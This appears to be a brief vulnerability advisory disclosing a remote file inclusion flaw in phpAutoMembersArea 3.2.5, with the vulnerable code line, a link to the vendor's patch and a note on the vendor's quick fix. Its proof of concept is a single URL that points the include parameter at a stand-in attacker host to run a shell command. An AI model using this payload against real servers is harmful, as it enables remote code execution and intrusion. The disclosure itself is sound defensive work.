+-------------------------------------------------------------------- + + phpAutoMembersArea 3.2.5 ($installed_config_file) Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: phpAutoMembersArea 3.2.5 + Venedor ...........: http://www.dwalker.co.uk + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Found by ..........: Philipp Niedziela + Original advisory .: http://www.bb-pcsecurity.de/sicherheit_83.htm + Contact ...........: webmaster[at]bb-pcsecurity[.]de + +-------------------------------------------------------------------- + + Code auto_check_renewals.php (line 20): + + ..... + include($installed_config_file);: + + ..... + +-------------------------------------------------------------------- + + $installed_config_file is not properly sanitized before being used + +-------------------------------------------------------------------- + + Solution: + Download the upgrade now: + http://www.dwalker.co.uk/phpautomembersarea/ + See: http://dwalker.co.uk/forum/viewtopic.php?t=517 + +-------------------------------------------------------------------- + + PoC: + http://[target]/auto_check_renewals.php?installed_config_file=http://evilsite.com?cmd=ls + +-------------------------------------------------------------------- + + Comment: + Thanks for the friendly and quick contact with the developer + David Walker. + Reported the vuln today at 10:04am -> patch available 4:47pm + -> ideal!!!! + +-------------------------[ E O F ]----------------------------------